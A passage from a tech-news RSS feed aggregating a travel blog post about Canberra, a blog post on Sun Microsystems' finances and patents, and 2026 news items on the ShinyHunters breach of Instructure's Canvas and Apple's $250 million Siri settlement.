<p>This morning, I woke up, ate breakfast at the hotel, and then wandered over to a Newsagent, where I picked up another book by the Dalai Lama (“The Transformed Mind: Reflections on Truth, Love and Happiness”), and two chocolate croissants and two chease rolls for the princely sum of $4.00 AUD, so I’ll something to snack on later in the day. I couldn’t get just the two chocolate croissants for $4 US from Au Bon Pain….</p>
<p>I then headed to the IBM office in Canberra, by way of a very pleasant walk through Telopia park. Lots of verdant green plants, like you might expect in a tropical or sub-tropical climate, but yet the temperature was quite mild and moderate. As I was walking through the park, I just felt incredibly calm and contented. Life is good.</p>
<p>The other really nice thing about Australia is that people are in general, really warm, open, and friendly. On my first day, I got a bit confused about which way I was supposed to exit the park on my way to the office, and someone who noticed that I was looking a little lost asked me if I needed help finding my way. Compared to my the previous week in New York City, I could really tell the difference.</p>
<p>As near as I can tell, there are only two problems with living in Australia. (1) It’s just way too far from the rest of the world. If I could fly from Boston to Sydney in six hours or less, I’d be really tempted to move out here. (2) Bandwidth is expensive. Folks generally pay 10 to 25 cents per megabyte. This is apparently mostly the fault of the U.S. ISP’s, which are charging really high settlement fees to the Australians. Bastards.</p>
<p>I really wish I could spend more time in Canberra. The ideal work life would be living and socialize in Boston, and then commuting to work in Canberra and hanging out with the Ozlabs folks. So if anyone events a teleportation device, I’ll be eternally grateful…</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Is the Linux community watching a setting Sun?]]></title>
<description><![CDATA[The title of this post was a headline that was probably written by an overly sensationalistic editor at http://www.searchenterpriselinux.com.  The actual article, though, was written by Pam Derringer, was a pretty balanced piece (although it obviously could have been more in-depth; given length a...]]></description>
<link>https://tsecurity.de/de/3500991/unix-server/is-the-linux-community-watching-a-setting-sun/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3500991/unix-server/is-the-linux-community-watching-a-setting-sun/</guid>
<pubDate>Fri, 08 May 2026 23:01:25 +0200</pubDate>
<category>🐧 Unix Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>The title of this post was a headline that was probably written by an overly sensationalistic editor at <!-- raw HTML omitted --><a href="http://www.searchenterpriselinux.com/">http://www.searchenterpriselinux.com</a><!-- raw HTML omitted -->.  The <!-- raw HTML omitted -->actual article<!-- raw HTML omitted -->, though, was written by Pam Derringer, was a pretty balanced piece (although it obviously could have been more in-depth; given length and time constraints, she talked to as many people as I think could have been expected, including a Sun spokeswoman, two analysts from different analyst companies, the chair of Apache Software Foundation, a Sun customer, and so on).</p>
<p>I’m not sure I’d agree with Jim Jagielski when he claims that Sun has the “best and brightest business people in the world,” though.  As I said in the article, and as I’ve said before, I have nothing but the highest respect for many of Sun’s engineers, especially those who work on Solaris.   But their <em>business people</em>?   I’m not so sure they have the best and brightest… in fact, I think that’s one of Sun’s greatest problems right now.  Compare that with the job that Mark Hurd has done with HP, or with the work done by the executives at my employer (IBM), and I’m not so sure a strong case can be made for the excellence of Sun’s business folk.  (I mean, how many people still believe that the $2 billion dollars which Sun spent to acquire Cobalt Networks, or the $4 billion dollars which Sun spent to acquire StorageTek, or the $1 billion dollars which Sun spent MySQL, were all good ideas?   Sun is currently valued by the market at $2.4 billion dollars!)</p>
<p>My bigger concern at the moment, however, is what happens if Sun gets purchased by a rival or by a corporate raider and gets broken up for parts?   Since November 19th, when Sun’s stock price crashed through $3.27 (and has hit a low of $2.60 recently), it has been trading for less than its per-stock cash value.  I say that not out of a sense of Schadenfreude, but out of concern about what happens if someone decides to buy the company, lay everyone off, and even after paying all of its debts, the resulting cash left over would be more than cost of completely buying the company — all of the real estate, the inventory, and the patent portfolio would all be pure profit.</p>
<p>It’s the last I’m most concerned about; Sun has a very large patent portfolio!   What if it fell into the hands of a patent troll?   What damage could be done to not just Linux and the OSS comunity, but the software industry as a whole?   Suppose Sun really does have patents that read upon many of NetApp’s products?   If those patents fall into the hands of a patent troll, NetApp would no longer be able to negotiate a peace settlement based on its patents (if they survive the on-going patent re-examination process) that read on ZFS, since the patent troll would no longer be making any products based on ZFS.   Maybe somewhere in Sun’s patent portfolio, there are patents that read on the GNOME and KDE desktops, but since Sun is trying to ship those with its Project Indiana/Open Solaris dekstop, it’s not bothering to assert them at this time?    What if a patent troll, perhaps one funded by Microsoft, gets their hands on those patents?</p>
<p>One final scary thought.   Sun’s current market cap: $2.40 billion USD.  Sun’s cash on hand: $2.63 billion USD.   Microsoft’s current cash on hand: $19.71 billion USD.   I can just imagine Steve Ballmer saying, “Chris, take it out of petty cash.  I have an itsy-bitsy little acquistion I want to make….  Now I can embrace and extend Java all I want!  And you know those term-limited, non-Open Source TCK licenses Sun gave to OpenJDK developers — not any more!  They’re gone, within a year, the next time Red Hat needs to get the license renewed!”</p>
<p>Could it happen?   What do you think?</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[ShinyHunters demands ransom after Instructure hack]]></title>
<description><![CDATA[Hackers give Instructure until 12 May to ‘negotiate a settlement’.
Read more: ShinyHunters demands ransom after Instructure hack]]></description>
<link>https://tsecurity.de/de/3498919/it-nachrichten/shinyhunters-demands-ransom-after-instructure-hack/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3498919/it-nachrichten/shinyhunters-demands-ransom-after-instructure-hack/</guid>
<pubDate>Fri, 08 May 2026 12:47:56 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Hackers give Instructure until 12 May to ‘negotiate a settlement’.</p>
<p>Read more: <a rel="nofollow" href="https://www.siliconrepublic.com/enterprise/shinyhunters-demands-ransom-after-instructure-hack">ShinyHunters demands ransom after Instructure hack</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Apple to Pay $250 Million over Misleading Siri AI Feature Claims]]></title>
<description><![CDATA[Apple has agreed to pay a massive $250 million to end a legal fight over false advertising. Buyers sued the company because it heavily promoted new artificial intelligence features and a smarter virtual assistant that simply did not exist when the latest phones launched. Although it denies any wr...]]></description>
<link>https://tsecurity.de/de/3498751/ios-mac-os/apple-to-pay-250-million-over-misleading-siri-ai-feature-claims/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3498751/ios-mac-os/apple-to-pay-250-million-over-misleading-siri-ai-feature-claims/</guid>
<pubDate>Fri, 08 May 2026 11:40:22 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Apple has agreed to pay a massive $250 million to end a legal fight over false advertising. Buyers sued the company because it heavily promoted new artificial intelligence features and a smarter virtual assistant that simply did not exist when the latest phones launched. Although it denies any wrongdoing, the tech giant chose to settle the case to avoid a long court battle.



The brand overpromised what its newest devices could actually do



When the company launched the iPhone 16 and the iPhone 15 Pro, it heavily advertised a brand-new system called Apple Intelligence. The marketing campaigns showed off a super smart version of Siri that could understand context and easily control different apps.



However, millions of people spent a lot of money on these devices only to realize the promised software was nowhere to be found. The actual tools were delayed for months, leaving buyers feeling tricked. Lawyers argued that the business purposely hyped up ghost features just to boost hardware sales and keep up with rival tech brands.



Eligible buyers can file a claim online to receive payment



If you bought an affected model in the United States between early June 2024 and late March 2025, you are likely part of the group that gets paid. The official settlement website will go live in the coming weeks. Once it opens, you can enter your device serial number to register for a payout.



Every approved person will get around $25, but that amount could climb all the way to $95 if fewer people apply. A judge still needs to give the final green light on the deal. After that happens, the funds will be sent out as digital checks or by physical mail.



This massive payout serves as a costly lesson for the entire tech world. It shows that companies cannot just sell expensive hardware on the promise of future software updates that might never arrive on time.]]></content:encoded>
</item>
<item>
<title><![CDATA[The Canvas Hack Is a New Kind of Ransomware Debacle]]></title>
<description><![CDATA[Wired describes the recent Canvas breach as an unusually disruptive ransomware-style extortion incident because one attack on Instructure's learning platform temporarily paralyzed thousands of schools during finals and end-of-year assignments. The hackers using the "ShinyHunters" name claim more ...]]></description>
<link>https://tsecurity.de/de/3498295/it-security-nachrichten/the-canvas-hack-is-a-new-kind-of-ransomware-debacle/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3498295/it-security-nachrichten/the-canvas-hack-is-a-new-kind-of-ransomware-debacle/</guid>
<pubDate>Fri, 08 May 2026 09:09:52 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Wired describes the recent Canvas breach as an unusually disruptive ransomware-style extortion incident because one attack on Instructure's learning platform temporarily paralyzed thousands of schools during finals and end-of-year assignments. The hackers using the "ShinyHunters" name claim more than 8,800 schools were affected, while Instructure says exposed data included names, email addresses, student ID numbers, and platform messages. From the report: Higher education has long been a target of ransomware gangs and data extortion attacks. But never before, perhaps, has a cyberattack against a single software platform so thoroughly disrupted the daily operations of thousands of schools across the United States. The widely used digital learning platform Canvas was put into "maintenance mode" on Thursday after its maker, the education tech giant Instructure, suffered a data breach and faced an extortion attempt by attackers using the recognizable moniker "ShinyHunters." Though the hackers have been advertising the breach and attempting to extract a ransom payment from Instructure since May 1, the situation took on additional immediacy for regular people across the US and beyond on Thursday because the Canvas downtime caused chaos at schools, including those in the midst of finals and end-of-year assignments.
 
Universities like Harvard, Columbia, Rutgers, and Georgetown sent alerts to students about the situation in recent days; other institutions, including school districts in at least a dozen states, also appear to have been affected. In a list published by the hackers behind the attack on their ransom-focused dark web site, they claim the breach affected more than 8,800 schools. The exact scale and reach of the breach is currently unclear, though. And the fact that Canvas was down throughout Thursday afternoon and evening further complicated the picture. In a running incident update log that began on May 1, Steve Proud, Instructure's chief information security officer, said that the company had "recently experienced a cybersecurity incident perpetrated by a criminal threat actor." He added on May 2 that "the information involved" for "users at affected institutions" included names, email addresses, student ID numbers, and messages exchanged by users on the platform.
 
The situation was ultimately marked as "Resolved" on Wednesday, with Proud writing that "Canvas is fully operational, and we are not seeing any ongoing unauthorized activity." At midday on Thursday, though, the Instructure status page registered an "issue" where "some users are having difficulties logging into Student ePortfolios." Within a few hours, the company had added another status update: "Instructure has placed Canvas, Canvas Beta and Canvas Test in maintenance mode." Late Thursday evening, the company said that Canvas was available again "for most users."
 
TechCrunch reported on Thursday that the hackers launched a secondary wave of attacks, defacing some schools' Canvas portals by injecting an HTML file to display their own message on the schools' Canvas login pages. According to The Harvard Crimson, attackers modified the Harvard Canvas login page to show a message that included a list of schools that the hackers claim were impacted by the breach. The message from attackers "urged schools included on the affected list to consult with a cyber advisory firm and contact the group privately to negotiate a settlement before the end of the day on May 12 -- or else risk their data being leaked," The Crimson reported. "It is unclear what information tied to Harvard affiliates was included in the alleged breach."<p></p><div class="share_submission">
<a class="slashpop" href="http://twitter.com/home?status=The+Canvas+Hack+Is+a+New+Kind+of+Ransomware+Debacle%3A+https%3A%2F%2Fit.slashdot.org%2Fstory%2F26%2F05%2F08%2F0622227%2F%3Futm_source%3Dtwitter%26utm_medium%3Dtwitter"><img src="https://a.fsdn.com/sd/twitter_icon_large.png"></a>
<a class="slashpop" href="http://www.facebook.com/sharer.php?u=https%3A%2F%2Fit.slashdot.org%2Fstory%2F26%2F05%2F08%2F0622227%2Fthe-canvas-hack-is-a-new-kind-of-ransomware-debacle%3Futm_source%3Dslashdot%26utm_medium%3Dfacebook"><img src="https://a.fsdn.com/sd/facebook_icon_large.png"></a>



</div><p><a href="https://it.slashdot.org/story/26/05/08/0622227/the-canvas-hack-is-a-new-kind-of-ransomware-debacle?utm_source=rss1.0moreanon&amp;utm_medium=feed">Read more of this story</a> at Slashdot.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[How to File Your Apple Siri Settlement Claim and Get Up to $95]]></title>
<description><![CDATA[Apple has agreed to pay $250 million to settle a class action lawsuit tied to delayed Apple Intelligence Siri features, and some iPhone users in the U.S. will soon be able to claim payouts of up to $95 per device. However, the payment will not arrive automatically because eligible users must subm...]]></description>
<link>https://tsecurity.de/de/3497856/ios-mac-os/how-to-file-your-apple-siri-settlement-claim-and-get-up-to-95/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3497856/ios-mac-os/how-to-file-your-apple-siri-settlement-claim-and-get-up-to-95/</guid>
<pubDate>Fri, 08 May 2026 05:26:40 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Apple has agreed to pay $250 million to settle a class action lawsuit tied to delayed Apple Intelligence Siri features, and some iPhone users in the U.S. will soon be able to claim payouts of up to $95 per device. However, the payment will not arrive automatically because eligible users must submit a claim within a limited time window once the settlement website goes live.



The lawsuit focused on Apple’s promotion of advanced Siri features during WWDC 2024 and the iPhone 16 launch cycle. Apple showed Siri understanding personal context, reading information from apps like Mail and Messages, and handling more advanced in-app actions. The company promoted those features across keynote presentations, its website, and television ads featuring actor Bella Ramsey.



Things changed in March 2025 when Apple officially delayed the personalized Siri experience, leading to accusations that the company had advertised features that were not ready for release. Apple later agreed to settle the lawsuit while continuing development of the delayed Siri upgrades.



Eligible users must live in the U.S. and must have purchased one of these iPhone models between June 10, 2024 and March 29, 2025:




iPhone 15 Pro



iPhone 15 Pro Max



iPhone 16



iPhone 16e



iPhone 16 Plus



iPhone 16 Pro



iPhone 16 Pro Max




According to settlement details, Apple expects to identify eligible customers by June 22, 2026, while customer notifications should begin by August 7, 2026. The final deadline to file a claim is expected to be November 6, 2026, giving users roughly 90 days to complete the process after receiving notification.



Each approved claim currently carries a payout of $25 per device, although that number can rise to as much as $95 if fewer people file claims than expected. Apple has not launched the settlement website yet, so users do not need to take any action right now.



Apple CEO Tim Cook recently said the delayed personalized Siri experience will launch later this year, with the features expected to arrive in iOS 27, iPadOS 27, and macOS 27. Reports also suggest Apple is working on a dedicated Siri app as part of its broader AI plans.]]></content:encoded>
</item>
<item>
<title><![CDATA[Apple’s $250M Siri Settlement Could Pay Eligible iPhone Buyers]]></title>
<description><![CDATA[Apple’s proposed $250M Siri settlement could pay eligible iPhone buyers. See who qualifies, how much they could receive, and what comes next.
The post Apple’s $250M Siri Settlement Could Pay Eligible iPhone Buyers appeared first on TechRepublic.]]></description>
<link>https://tsecurity.de/de/3496498/it-nachrichten/apples-250m-siri-settlement-could-pay-eligible-iphone-buyers/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3496498/it-nachrichten/apples-250m-siri-settlement-could-pay-eligible-iphone-buyers/</guid>
<pubDate>Thu, 07 May 2026 17:05:01 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Apple’s proposed $250M Siri settlement could pay eligible iPhone buyers. See who qualifies, how much they could receive, and what comes next.</p>
<p>The post <a href="https://www.techrepublic.com/article/news-apple-siri-settlement-iphone-payout/">Apple’s $250M Siri Settlement Could Pay Eligible iPhone Buyers</a> appeared first on <a href="https://www.techrepublic.com/">TechRepublic</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Some iPhone owners could get up to $95 after Apple agrees to settle Apple Intelligence false advertising lawsuit]]></title>
<description><![CDATA[Owners of certain iPhones could receive cash payments of up to $95 from Apple following the company’s $250 million settlement…
The post Some iPhone owners could get up to $95 after Apple agrees to settle Apple Intelligence false advertising lawsuit appeared first on MacDailyNews.]]></description>
<link>https://tsecurity.de/de/3494150/ios-mac-os/some-iphone-owners-could-get-up-to-95-after-apple-agrees-to-settle-apple-intelligence-false-advertising-lawsuit/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3494150/ios-mac-os/some-iphone-owners-could-get-up-to-95-after-apple-agrees-to-settle-apple-intelligence-false-advertising-lawsuit/</guid>
<pubDate>Thu, 07 May 2026 00:12:28 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Owners of certain iPhones could receive cash payments of up to $95 from Apple following the company’s $250 million settlement…</p>
<p>The post <a href="https://macdailynews.com/2026/05/06/some-iphone-owners-could-get-up-to-95-after-apple-agrees-to-settle-apple-intelligence-false-advertising-lawsuit/">Some iPhone owners could get up to $95 after Apple agrees to settle Apple Intelligence false advertising lawsuit</a> appeared first on <a href="https://macdailynews.com/">MacDailyNews</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Sorry, iPhone 17 Users: You Don’t Qualify for Apple’s $250 Million Siri Lawsuit Settlement]]></title>
<description><![CDATA[Apple still denies wrongdoing.]]></description>
<link>https://tsecurity.de/de/3493968/it-nachrichten/sorry-iphone-17-users-you-dont-qualify-for-apples-250-million-siri-lawsuit-settlement/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3493968/it-nachrichten/sorry-iphone-17-users-you-dont-qualify-for-apples-250-million-siri-lawsuit-settlement/</guid>
<pubDate>Wed, 06 May 2026 22:32:03 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Apple still denies wrongdoing.]]></content:encoded>
</item>
<item>
<title><![CDATA[How to Collect on Apple's $250 Million AI iPhone Settlement]]></title>
<description><![CDATA[The company will start paying the quarter-billion-dollar sum to settle a lawsuit over delayed and missing AI features.]]></description>
<link>https://tsecurity.de/de/3493834/it-nachrichten/how-to-collect-on-apples-250-million-ai-iphone-settlement/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3493834/it-nachrichten/how-to-collect-on-apples-250-million-ai-iphone-settlement/</guid>
<pubDate>Wed, 06 May 2026 20:47:49 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[The company will start paying the quarter-billion-dollar sum to settle a lawsuit over delayed and missing AI features.]]></content:encoded>
</item>
<item>
<title><![CDATA[Apple settlement will pay out $250 million over delayed Siri AI  — how to claim yours]]></title>
<description><![CDATA[The Apple settlement over delayed Siri AI totals a whopping $250 million. Here's how to claim your little piece of that pie. 
(via Cult of Mac - Your source for the latest Apple news, rumors, analysis, reviews, how-tos and deals.)]]></description>
<link>https://tsecurity.de/de/3493161/ios-mac-os/apple-settlement-will-pay-out-250-million-over-delayed-siri-ai-how-to-claim-yours/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3493161/ios-mac-os/apple-settlement-will-pay-out-250-million-over-delayed-siri-ai-how-to-claim-yours/</guid>
<pubDate>Wed, 06 May 2026 17:10:41 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div><img width="780" height="439" src="https://www.cultofmac.com/wp-content/uploads/2026/01/Apple-Siri-AI-chatbot.jpg" class="attachment-large size-large wp-post-image" alt="Apple may reinvent Siri as a conversational AI in iOS 27" decoding="async" fetchpriority="high" srcset="https://www.cultofmac.com/wp-content/uploads/2026/01/Apple-Siri-AI-chatbot.jpg.webp 1365w, https://www.cultofmac.com/wp-content/uploads/2026/01/Apple-Siri-AI-chatbot-400x225.jpg 400w, https://www.cultofmac.com/wp-content/uploads/2026/01/Apple-Siri-AI-chatbot-350x197.jpg 350w, https://www.cultofmac.com/wp-content/uploads/2026/01/Apple-Siri-AI-chatbot-768x432.jpg.webp 768w, https://www.cultofmac.com/wp-content/uploads/2026/01/Apple-Siri-AI-chatbot-1020x574.jpg.webp 1020w, https://www.cultofmac.com/wp-content/uploads/2026/01/Apple-Siri-AI-chatbot-400x225@2x.jpg 800w" sizes="(max-width: 780px) 100vw, 780px"></div>
<p>The Apple settlement over delayed Siri AI totals a whopping $250 million. Here's how to claim your little piece of that pie. </p>
<p>(via <a href="https://www.cultofmac.com/">Cult of Mac - Your source for the latest Apple news, rumors, analysis, reviews, how-tos and deals.</a>)</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Apple settles shareholder lawsuit over Siri AI vaporware for $250 million]]></title>
<description><![CDATA[Apple has reached a $250 million settlement to resolve a shareholder lawsuit stemming from the delayed rollout of key artificial intelligence…
The post Apple settles shareholder lawsuit over Siri AI vaporware for $250 million appeared first on MacDailyNews.]]></description>
<link>https://tsecurity.de/de/3493090/ios-mac-os/apple-settles-shareholder-lawsuit-over-siri-ai-vaporware-for-250-million/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3493090/ios-mac-os/apple-settles-shareholder-lawsuit-over-siri-ai-vaporware-for-250-million/</guid>
<pubDate>Wed, 06 May 2026 16:43:07 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Apple has reached a $250 million settlement to resolve a shareholder lawsuit stemming from the delayed rollout of key artificial intelligence…</p>
<p>The post <a href="https://macdailynews.com/2026/05/06/apple-settles-shareholder-lawsuit-over-siri-ai-vaporware-for-250-million/">Apple settles shareholder lawsuit over Siri AI vaporware for $250 million</a> appeared first on <a href="https://macdailynews.com/">MacDailyNews</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Apple Intelligence hype cost the company $250M]]></title>
<description><![CDATA[The mishaps around Apple Intelligence have gone beyond denting Apple’s reputation – they have also cost the company $250 million in damages over smarter Siri delays.



Think back to the original introduction of Apple Intelligence and you might recall a promotional video that explained how a new ...]]></description>
<link>https://tsecurity.de/de/3492958/it-nachrichten/apple-intelligence-hype-cost-the-company-250m/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3492958/it-nachrichten/apple-intelligence-hype-cost-the-company-250m/</guid>
<pubDate>Wed, 06 May 2026 16:03:07 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>The mishaps around Apple Intelligence have gone beyond denting Apple’s reputation – they have also cost the company $250 million in damages over smarter Siri delays.</p>



<p>Think back to the original introduction of Apple Intelligence and you might recall a promotional video that explained how a new and smarter Siri would act as your contextually-smart AI companion, helping you get things done. Almost two years later, that smarter Siri still hasn’t shipped — and while Apple has made <a href="https://www.computerworld.com/article/3989461/drama-at-apple-as-ai-failures-cause-heads-to-roll.html">major changes in management, AI strategy, and approach</a>, this contextual companion isn’t now expected until later this year. </p>



<p>Hopefully.</p>



<p>Apple Intelligence <a href="https://www.computerworld.com/article/3842236/is-apple-intelligence-the-new-apple-maps.html">can be seen as a Maps-launch style debacle</a> on the part of the company. (Apple <a href="https://forums.macrumors.com/threads/apple-says-personalized-siri-features-shown-at-wwdc-last-year-were-real-and-working.2458695/" target="_blank" rel="noreferrer noopener">even had to deny</a> that the video presentation for those features shown <a href="https://www.computerworld.com/article/2139629/wwdc-and-apple-intelligence-what-to-expect.html">at WWDC 2024</a> (no longer officially available) was made up.)</p>



<h2 class="wp-block-heading"><strong>Apple Intelligence’s $250M punishment</strong></h2>



<p>The entire affair left some iPhone users unhappy, so they launched a class action lawsuit against the company for delaying introduction of the “more personalized Siri.” Apple agreed to pay $250 million to settle the case last December – a figure that works out to between $25 and $95 per device, depending on how many iPhone customers submit claims. </p>



<p>(Compensation is available to US customers who purchased an iPhone 15 Pro, 15 Pro Max or the iPhone 16 family of devices between June 2024 and March 2025.)</p>



<p>The case against the company claimed it “Promoted AI capabilities that did not exist at the time, do not exist, and will not exist for two or more years.” </p>



<p>To make matters worse, Apple pushed these new features after their introduction at WWDC — even linking a later iPhone update to its AI. Looking back now, this wasn’t a great idea since it made things much more embarrassing once Apple failed to deliver. That’s why the class action succeeded.</p>



<h2 class="wp-block-heading"><strong>Don’t promise too much</strong></h2>



<p>The lesson here is that, in general, even a snake oil salesman needs to kill a couple of snakes before putting the essence in a bottle; in this case, the snake hadn’t yet been located. Apple has not admitted any wrongdoing as part of the settlement, saying it acted in “good faith” and “reasonably” thought it had complied with all applicable rules and regulations.</p>



<p>Apple now appears committed to <a href="https://www.computerworld.com/article/4151914/is-apple-planning-an-app-store-for-ai.html">a new partner-based strategy</a> in which it builds the very best hardware on which to run AI, allowing users to choose whichever brand of AI they want to use on-device. At the same time, Apple is focused on building Apple Intelligence as a viable alternative. This will take time, but Apple will no doubt press ahead until it gets Apple Intelligence right.</p>



<p>In a statement, the company told <em><a href="https://9to5mac.com/2026/05/05/apple-reaches-250m-settlement-over-siri-delays-users-could-get-up-to-95-per-device/" target="_blank" rel="noreferrer noopener">9to5Mac</a></em>: “Since the launch of Apple Intelligence, we have introduced dozens of features across many languages that are integrated across Apple’s platforms, relevant to what users do every day, and built with privacy protections at every step.”</p>



<h2 class="wp-block-heading"><strong>The plot thickens (intelligently)</strong></h2>



<p>That statement also stressed Apple’s continued focus on building those Apple Intelligence features. You could see that claim as an inevitable reaction to the criticism the company faces. I prefer to see it as confirmation that Apple has adopted the AI+ strategy, (best hardware and a choice of AI, including its own increasingly competitive Apple Intelligence brand). During <a href="https://www.computerworld.com/article/4166537/apple-is-preparing-to-spend-but-not-necessarily-on-ai.html">last week’s earnings call</a>, Apple CEO Tim Cook described the sheer importance of AI to its ecosystem.</p>



<p>“What truly sets Apple apart is how Apple Intelligence is woven into the core of our platforms, powered by Apple Silicon, and designed from the ground up to deliver intelligence that is fast, personal, and private,” he said. “This is not AI as a standalone feature, but AI as an essential intuitive part of the experience across our devices.”</p>



<p>More importantly, in the long run, Apple believes that by providing <a href="https://www.applemust.com/ai-kills-apples-599-mac-mini/" target="_blank" rel="noreferrer noopener">the best development platform</a> it can also attract the AI developers and services it needs on which to build its future. I think this approach will succeed.</p>



<p>Still, as the class action settlement shows, the original introduction of Apple Intelligence may enter the history books as a classic case of hype over substance. Under internal and external pressure to regain the initiative in AI development, the company abandoned its usual conservative approach to making big claims, in which it tends to under-promise then over-deliver. Customers like nice surprises more than they enjoy empty promises; Apple usually knows that.</p>



<p><em>You can follow me on social media! Join me on </em><a href="https://bsky.app/profile/jonnyevanssays.bsky.social" target="_blank" rel="noreferrer noopener"><em>BlueSky</em></a><em>,  <a href="https://www.linkedin.com/in/jonnyevans/" target="_blank" rel="noreferrer noopener">LinkedIn</a>, and </em><a href="https://social.vivaldi.net/@jonnyevans" target="_blank" rel="noreferrer noopener"><em>Mastodon</em></a><em>.</em></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[IT Security News Hourly Summary 2026-05-06 12h : 9 posts]]></title>
<description><![CDATA[9 posts were published in the last hour 9:36 : Is biometric fraud on the rise? 9:36 : Apple To Pay $250m In Settlement Over AI Delays 9:36 : Salesforce Marketing Cloud Vulnerability Exposes Email Data Risk 9:36 : Palo…
Read more →
The post IT Security News Hourly Summary 2026-05-06 12h : 9 posts ...]]></description>
<link>https://tsecurity.de/de/3492253/it-security-nachrichten/it-security-news-hourly-summary-2026-05-06-12h-9-posts/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3492253/it-security-nachrichten/it-security-news-hourly-summary-2026-05-06-12h-9-posts/</guid>
<pubDate>Wed, 06 May 2026 12:09:25 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>9 posts were published in the last hour 9:36 : Is biometric fraud on the rise? 9:36 : Apple To Pay $250m In Settlement Over AI Delays 9:36 : Salesforce Marketing Cloud Vulnerability Exposes Email Data Risk 9:36 : Palo…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/it-security-news-hourly-summary-2026-05-06-12h-9-posts/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/it-security-news-hourly-summary-2026-05-06-12h-9-posts/">IT Security News Hourly Summary 2026-05-06 12h : 9 posts</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Apple Agrees to Pay $250 Million Settlement to iPhone 16, iPhone 15 Pro Owners for Misleading AI Claims]]></title>
<description><![CDATA[Apple has reportedly reached a settlement in the class action lawsuit filed by iPhone owners over the Cupertino-based tech giant's claims on the capabilities of its “Apple Intelligence” suite of tools, according to a report citing a court filing. The tech giant could reportedly pay $250 million (...]]></description>
<link>https://tsecurity.de/de/3492239/it-nachrichten/apple-agrees-to-pay-250-million-settlement-to-iphone-16-iphone-15-pro-owners-for-misleading-ai-claims/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3492239/it-nachrichten/apple-agrees-to-pay-250-million-settlement-to-iphone-16-iphone-15-pro-owners-for-misleading-ai-claims/</guid>
<pubDate>Wed, 06 May 2026 12:03:00 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Apple has reportedly reached a settlement in the class action lawsuit filed by iPhone owners over the Cupertino-based tech giant's claims on the capabilities of its “Apple Intelligence” suite of tools, according to a report citing a court filing. The tech giant could reportedly pay $250 million (about Rs. 2,367 crore) in total in compensation to a select group of ...]]></content:encoded>
</item>
<item>
<title><![CDATA[Apple To Pay $250m In Settlement Over AI Delays]]></title>
<description><![CDATA[Apple settles class-action lawsuit with consumers who argued company oversold, under-delivered AI capabilities This article has been indexed from Silicon UK Read the original article: Apple To Pay $250m In Settlement Over AI Delays
Read more →
The post Apple To Pay $250m In Settlement Over AI Del...]]></description>
<link>https://tsecurity.de/de/3492102/it-security-nachrichten/apple-to-pay-250m-in-settlement-over-ai-delays/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3492102/it-security-nachrichten/apple-to-pay-250m-in-settlement-over-ai-delays/</guid>
<pubDate>Wed, 06 May 2026 11:37:17 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Apple settles class-action lawsuit with consumers who argued company oversold, under-delivered AI capabilities This article has been indexed from Silicon UK Read the original article: Apple To Pay $250m In Settlement Over AI Delays</p>
